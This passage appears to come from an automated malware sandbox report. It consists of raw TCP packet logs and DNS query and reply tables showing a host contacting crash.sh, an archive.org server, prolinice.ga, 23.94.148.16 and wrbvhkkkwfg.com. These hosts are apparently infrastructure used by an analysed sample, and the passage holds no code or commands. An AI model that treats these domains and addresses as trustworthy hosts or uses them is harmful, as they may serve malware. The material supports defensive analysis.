                                                      Aug 31, 2024 15:51:45.912873983 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:45.912914038 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.912925005 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.912934065 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.912947893 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.912956953 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:45.912986040 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:45.912993908 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913005114 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913013935 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913024902 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913034916 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:45.913059950 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:45.913716078 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913727045 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913738012 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913747072 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:45.913757086 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:45.913778067 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028119087 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028136969 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028153896 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028163910 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028173923 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028192997 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028192997 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028206110 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028207064 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028215885 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028228045 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028238058 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028249025 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028254986 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028261900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028266907 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028273106 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028281927 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028294086 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028299093 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028304100 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028316021 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028326988 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028350115 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028374910 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028383017 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028402090 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028413057 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028422117 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028431892 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028441906 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028445005 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028453112 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028462887 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028467894 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028472900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028498888 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028502941 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028510094 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028520107 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028528929 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028533936 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028542995 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.028548956 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028573990 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028600931 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028712988 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.028974056 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029067039 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029078007 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029108047 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.029181957 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029192924 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029203892 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029216051 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029222965 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.029253006 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.029328108 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029339075 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029350042 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029360056 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029366016 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.029371023 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029388905 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.029556036 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029567957 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029577971 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029588938 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.029597044 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.029620886 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.030642033 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.031179905 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.031220913 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.077807903 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.077821016 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.077831984 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.077843904 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.077860117 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.077873945 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.078730106 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078741074 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078753948 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078780890 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.078881979 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078893900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078903913 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078908920 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078913927 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.078938961 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.078984976 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.078984976 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.078999996 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079010963 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079035997 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079224110 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079241037 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079260111 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079269886 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079277992 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079279900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079292059 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079302073 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079302073 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079312086 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079322100 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079323053 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079334021 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079346895 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079346895 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079380035 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079407930 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079418898 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079448938 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079449892 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079461098 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079485893 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079582930 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079600096 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079611063 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079632044 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079669952 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079680920 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079691887 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079701900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079703093 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079724073 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079917908 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079929113 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079940081 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079965115 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.079987049 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.079999924 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080022097 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080148935 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080161095 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080173016 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080183983 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080193043 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080208063 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080308914 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080321074 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080332041 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080354929 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080395937 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080406904 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080419064 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080439091 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080439091 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080451012 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080456972 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080461979 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080473900 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.080499887 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.080499887 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.082700968 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082719088 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082748890 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.082822084 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082922935 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082945108 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082957029 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082958937 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.082968950 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.082993031 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.083067894 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083079100 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083089113 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083098888 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083103895 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.083110094 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083128929 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.083137989 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083148003 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.083170891 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.115339041 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115349054 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115354061 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115359068 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115364075 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115367889 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115372896 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115377903 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115381956 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115387917 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115392923 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115397930 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115403891 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.115516901 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.115551949 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142714024 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142735958 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142745972 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142755032 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142765999 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142771006 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142771006 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142790079 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142798901 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142800093 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142812014 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142822981 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142843962 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142865896 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142877102 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142887115 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142896891 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142908096 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.142914057 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.142937899 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.145951033 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.145962000 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.145972013 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146001101 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146012068 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146027088 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146038055 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146049023 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146051884 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146070004 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146090984 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146107912 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146119118 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146128893 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146131039 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146138906 CEST8049173185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:46.146152020 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146178961 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:46.146281958 CEST4917380192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.473576069 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.478656054 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:49.478727102 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.478857994 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.478885889 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:49.483880997 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:49.483963013 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:49.483972073 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:50.536051035 CEST8049174185.251.91.119192.168.2.22
                                                      Aug 31, 2024 15:51:50.730698109 CEST4917480192.168.2.22185.251.91.119
                                                      Aug 31, 2024 15:51:50.936362028 CEST4917480192.168.2.22185.251.91.119
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 31, 2024 15:50:57.289438009 CEST5456253192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:50:57.296216965 CEST53545628.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:50:59.218322039 CEST5291753192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:50:59.232013941 CEST53529178.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:00.309302092 CEST6275153192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:00.318290949 CEST53627518.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:00.320230961 CEST5789353192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:00.326956987 CEST53578938.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:04.806396008 CEST5482153192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:04.813397884 CEST53548218.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:04.814671040 CEST5471953192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:04.821609020 CEST53547198.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:10.329627037 CEST4988153192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:10.338493109 CEST53498818.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:10.340023994 CEST5499853192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:10.347018003 CEST53549988.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:18.990689993 CEST5278153192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:19.002280951 CEST53527818.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:44.164791107 CEST6392653192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:44.265943050 CEST53639268.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:44.269380093 CEST6551053192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:44.375876904 CEST53655108.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:49.341362000 CEST6267253192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:49.353054047 CEST53626728.8.8.8192.168.2.22
                                                      Aug 31, 2024 15:51:49.365849972 CEST5647553192.168.2.228.8.8.8
                                                      Aug 31, 2024 15:51:49.472837925 CEST53564758.8.8.8192.168.2.22
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Aug 31, 2024 15:50:57.289438009 CEST192.168.2.228.8.8.80xd1d0Standard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:50:59.218322039 CEST192.168.2.228.8.8.80x964eStandard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:00.309302092 CEST192.168.2.228.8.8.80xc8aStandard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:00.320230961 CEST192.168.2.228.8.8.80xd83bStandard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:04.806396008 CEST192.168.2.228.8.8.80x1100Standard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:04.814671040 CEST192.168.2.228.8.8.80x2664Standard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:10.329627037 CEST192.168.2.228.8.8.80xb6ecStandard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:10.340023994 CEST192.168.2.228.8.8.80xd97eStandard query (0)crash.shA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:18.990689993 CEST192.168.2.228.8.8.80xcfa0Standard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:44.164791107 CEST192.168.2.228.8.8.80xa59fStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:44.269380093 CEST192.168.2.228.8.8.80x575cStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:49.341362000 CEST192.168.2.228.8.8.80x604aStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:49.365849972 CEST192.168.2.228.8.8.80xb8ffStandard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Aug 31, 2024 15:50:57.296216965 CEST8.8.8.8192.168.2.220xd1d0No error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:50:59.232013941 CEST8.8.8.8192.168.2.220x964eNo error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:00.318290949 CEST8.8.8.8192.168.2.220xc8aNo error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:00.326956987 CEST8.8.8.8192.168.2.220xd83bNo error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:04.813397884 CEST8.8.8.8192.168.2.220x1100No error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:04.821609020 CEST8.8.8.8192.168.2.220x2664No error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:10.338493109 CEST8.8.8.8192.168.2.220xb6ecNo error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:10.347018003 CEST8.8.8.8192.168.2.220xd97eNo error (0)crash.sh208.64.171.230A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:19.002280951 CEST8.8.8.8192.168.2.220xcfa0No error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:44.265943050 CEST8.8.8.8192.168.2.220xa59fNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:44.375876904 CEST8.8.8.8192.168.2.220x575cNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:49.353054047 CEST8.8.8.8192.168.2.220x604aNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                      Aug 31, 2024 15:51:49.472837925 CEST8.8.8.8192.168.2.220xb8ffNo error (0)prolinice.ga185.251.91.119A (IP address)IN (0x0001)false
                                                      • crash.sh
                                                      • ia803104.us.archive.org
                                                      • 23.94.148.16
                                                      • wrbvhkkkwfg.com
                                                        • prolinice.ga
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
